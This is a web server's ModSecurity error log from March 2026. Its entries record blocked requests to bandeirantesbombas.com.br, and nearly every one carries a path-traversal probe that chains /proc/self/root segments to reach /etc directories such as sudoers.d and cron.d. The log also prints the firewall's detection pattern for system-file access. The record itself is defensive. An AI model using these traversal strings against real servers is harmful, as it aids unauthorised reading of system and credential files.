[Mon Mar 16 18:09:25.108069 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.241.46:37512] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxhVajLEzk2WiQ-10uiAAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:27.351628 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.241.46:37522] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxh46lpbStxTqkSkuFDwAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:29.736107 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:53892] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxibABkC4fWIHEf8ET0AAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:32.207236 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.241.46:53896] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxjLysWC90G-1nBrBg8AAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:33.512829 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.241.46:53902] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxjaTCbgAP5jq5TehH1QAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:40.568807 2026] [:error] [pid 29802:tid 140411582465792] [client 74.7.241.46:53910] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxlM_BxrYCr4hPDw8GZwAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:45.100797 2026] [:error] [pid 14895:tid 140411540502272] [client 74.7.241.46:41246] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxmVajLEzk2WiQ-10ukAAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:46.364743 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:41260] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxmv9ocpUE4ed4uDwPiAAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:47.600806 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:41266] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxm7ysWC90G-1nBrBg8wAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:52.358365 2026] [:error] [pid 10651:tid 140411674785536] [client 74.7.241.46:52590] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxn7ysWC90G-1nBrBg9gAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:53.705037 2026] [:error] [pid 29507:tid 140411741927168] [client 74.7.241.46:52592] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxoUr9dMAiw-8KANNlCQAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:59.022498 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.244.31:49246] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhxp7ABkC4fWIHEf8ET1AAAAFg"]
[Mon Mar 16 18:10:06.507372 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.241.46:52596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxrrysWC90G-1nBrBhAwAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:10:08.662931 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.241.46:41856] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxr6TCbgAP5jq5TehH2QAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:10:09.953409 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.241.46:46358] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxsf9ocpUE4ed4uDwPkwAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:10:13.287566 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.241.46:46374] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxtY6lpbStxTqkSkuFFgAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:10:14.582914 2026] [:error] [pid 29507:tid 140411624429312] [client 74.7.241.46:46390] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxtkr9dMAiw-8KANNlCwAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:10:15.750261 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.241.46:46394] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxt9SswJuvopo3lOh8qAAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:10:20.472688 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:46404] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxvP9ocpUE4ed4uDwPmgAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:10:21.762691 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:43612] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxvf9ocpUE4ed4uDwPnQAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:10:23.665215 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.243.203:49596] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxv6QpVkWug9HeOt9QHQAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:10:28.000643 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.241.46:43620] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxw1ajLEzk2WiQ-10umAAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
